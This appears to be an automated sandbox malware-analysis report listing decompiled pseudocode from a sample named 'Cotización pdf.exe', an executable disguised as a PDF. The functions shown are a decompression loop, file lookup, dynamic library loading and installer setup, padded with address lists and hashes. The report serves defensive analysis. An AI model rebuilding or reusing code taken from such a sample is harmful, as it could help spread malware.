								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x0040604c
0x0040604c
0x00406051
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x00000000
0x0040672b
0x00406053
0x00406053
0x00406057
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406078
0x0040607f
0x00406082
0x0040608d
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x0040609c
0x004060ba
0x004060bc
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062e1
0x004062e4
0x00406287
0x0040628d
0x00000000
0x00000000
0x00000000
0x004062e6
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406284
0x00000000
0x00406284
0x0040609e
0x0040609e
0x004060a1
0x004060a7
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406190
0x00406193
0x0040610a
0x0040610a
0x00406110
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x0040621d
0x00406220
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061c0
0x004061c0
0x00406220
0x00406227
0x00406227
0x00406227
0x0040622b
0x0040622b
0x0040622e
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x004063f7
0x004063f7
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040611c
0x00000000
0x00000000
0x00000000
0x00406199
0x004060e5
0x004060e9
0x00406856
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406107
0x00000000
0x00406107
0x00406193
0x0040609c
0x00405ed0
0x00405ed0
0x00405ed9
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x00000000
0x004066b5
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00000000
0x00406828
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x00000000
0x0040667d
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}

0x00405d87
0x00405d90
0x00000000
0x00405d9d
0x00405d93
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,7519F560,004053BE,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,7519F560), ref: 00405D87
FindClose.KERNEL32(00000000), ref: 00405D93

Strings

$B, xrefs: 00405D7D

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: $B
API String ID: 2295610775-2366330246
Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405dab
0x00405dae
0x00405db5
0x00405dbd
0x00405dca
0x00000000
0x00405dd1
0x00405dc0
0x00405dc8
0x00000000
0x00000000
0x00405dd9

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA

Uniqueness

Uniqueness Score: -1.00%

Function 004035E3, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0;
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x422e40;
					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x72
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004035e9
0x004035f2
0x004035f9
0x004035fb
0x0040360f
0x00403621
0x0040362b
0x00403630
0x00403636
0x00403649
0x00403649
0x00403654
0x004035fd
0x00403608
0x00403608
0x00403659
0x00403663
0x0040366c
0x00403678
0x004036ff
0x00403707
0x00403710
0x00403710
0x00403726
0x0040372c
0x0040373a
0x004037c9
0x004037d1
0x004037db
0x004037e0
0x004037e6
0x00403865
0x0040386a
0x0040386c
0x00403888
0x00000000
0x00403888
0x0040386e
0x00403874
0x0040387c
0x0040387c
0x00000000
0x00403874
0x004037f0
0x00403801
0x00403803
0x00403805
0x0040380c
0x0040380c
0x00403814
0x0040381c
0x0040381e
0x00403820
0x00403829
0x0040382c
0x00403832
0x00403832
0x00403851
